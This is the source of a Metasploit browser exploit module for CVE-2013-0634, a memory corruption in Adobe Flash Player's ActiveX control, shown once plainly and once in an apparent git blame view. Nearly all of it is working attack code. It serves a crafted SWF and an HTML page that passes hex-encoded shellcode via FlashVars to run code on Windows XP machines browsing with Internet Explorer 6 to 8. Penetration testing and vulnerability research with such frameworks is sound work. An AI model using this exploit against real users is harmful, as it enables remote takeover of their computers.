metasploit-framework/modules/exploits/windows/browser/adobe_flash_regex_value.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player 11.5 Remote Memory Corruption",
      'Description'    => %q{
         This module exploits a vulnerability found in the ActiveX component of Adobe
        Flash Player before 11.5.502.149. By supplying a specially crafted swf file
        with special regex value, it is possible to trigger an memory corruption, which
        results in remote code execution under the context of the user. This 
        vulnerability has also been exploited in the wild in February 2013.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # malware sample
          'Boris "dukeBarman" Ryutin' # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0634' ],
          [ 'OSVDB', '89936'],
          [ 'BID', '57787'],
          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
        ],
      'Payload'        =>
        {
          'Space' => 1024
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f',
          'EXITFUNC'             => 'thread',
          'HTTP::compression'    => 'gzip',
          'HTTP::chunked'        => true,
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source => /script/i,
          :clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
          :method => "LoadMovie",
          :os_name => /win/i
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 6',
            {
              'os_flavor' => 'XP',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '6.0'
            }
          ],
          [
            'Windows XP with IE 7',
            {
              'os_flavor' => 'XP',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '7.0'
            }
          ],
          [
            'Windows XP with IE 8',
            {
              'os_flavor' => 'XP',
              'ua_name'   => 'MSIE',
              'ua_ver'    => '8.0'
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 8 2013",
      'DefaultTarget'  => 0))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("request: #{request.uri}")
    if request.uri.match(/\.swf$/i)
      print_status("Sending SWF")
      send_response(cli, generate_swf, { 'Content-Type'=>'application/x-shockwave-flash' })
    else
      print_status("Sending HTML")
      send_response_html(cli, generate_html(target_info))
    end
  end

  def generate_html(target_info)
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

    %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="#{get_module_uri}/Main.swf" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="his=#{shellcode}" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |
  end

  def generate_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    return swf
  end

end
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

Fix bugs 2014-01-18 22:04:46 +00:00			`include Msf::Exploit::Remote::BrowserExploitServer`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00
			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Adobe Flash Player 11.5 Remote Memory Corruption",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in the ActiveX component of Adobe`
			`Flash Player before 11.5.502.149. By supplying a specially crafted swf file`
Fix bugs 2014-01-18 22:04:46 +00:00			`with special regex value, it is possible to trigger an memory corruption, which`
			`results in remote code execution under the context of the user. This`
			`vulnerability has also been exploited in the wild in February 2013.`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Unknown', # malware sample`
			`'Boris "dukeBarman" Ryutin' # msf exploit`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2013-0634' ],`
			`[ 'OSVDB', '89936'],`
			`[ 'BID', '57787'],`
			`[ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],`
			`[ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],`
			`[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],`
			`[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],`
			`[ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 1024`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'InitialAutoRunScript' => 'migrate -f',`
			`'EXITFUNC' => 'thread',`
			`'HTTP::compression' => 'gzip',`
			`'HTTP::chunked' => true,`
			`},`
			`'Platform' => 'win',`
Fix bugs 2014-01-18 22:04:46 +00:00			`'BrowserRequirements' =>`
			`{`
			`:source => /script/i,`
			`:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",`
			`:method => "LoadMovie",`
			`:os_name => /win/i`
			`},`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`'Targets' =>`
			`[`
			`[ 'Automatic', {} ],`
Fix bugs 2014-01-18 22:04:46 +00:00			`[`
			`'Windows XP with IE 6',`
			`{`
			`'os_flavor' => 'XP',`
			`'ua_name' => 'MSIE',`
			`'ua_ver' => '6.0'`
			`}`
			`],`
			`[`
			`'Windows XP with IE 7',`
			`{`
			`'os_flavor' => 'XP',`
			`'ua_name' => 'MSIE',`
			`'ua_ver' => '7.0'`
			`}`
			`],`
			`[`
			`'Windows XP with IE 8',`
			`{`
			`'os_flavor' => 'XP',`
			`'ua_name' => 'MSIE',`
			`'ua_ver' => '8.0'`
			`}`
			`],`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "Feb 8 2013",`
			`'DefaultTarget' => 0))`
			`end`

Fix bugs 2014-01-18 22:04:46 +00:00			`def on_request_exploit(cli, request, target_info)`
			`print_status("request: #{request.uri}")`
			`if request.uri.match(/\.swf$/i)`
			`print_status("Sending SWF")`
			`send_response(cli, generate_swf, { 'Content-Type'=>'application/x-shockwave-flash' })`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`else`
Fix bugs 2014-01-18 22:04:46 +00:00			`print_status("Sending HTML")`
			`send_response_html(cli, generate_html(target_info))`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`end`
			`end`

Fix bugs 2014-01-18 22:04:46 +00:00			`def generate_html(target_info)`
			`shellcode = get_payload(cli, target_info).unpack("H*")[0]`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00
Fix bugs 2014-01-18 22:04:46 +00:00			`%Q\|<html>`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`<body>`
			`<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />`
Fix bugs 2014-01-18 22:04:46 +00:00			`<param name="movie" value="#{get_module_uri}/Main.swf" />`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`<param name="allowScriptAccess" value="always" />`
			`<param name="FlashVars" value="his=#{shellcode}" />`
			`<param name="Play" value="true" />`
			`</object>`
			`</body>`
			`</html>`
			`\|`
			`end`

Fix bugs 2014-01-18 22:04:46 +00:00			`def generate_swf`
Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )`
Fix bugs 2014-01-18 22:04:46 +00:00			`swf = ::File.open(path, 'rb') { \|f\| swf = f.read }`

Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption 2014-01-18 16:07:11 +00:00			`return swf`
			`end`

			`end`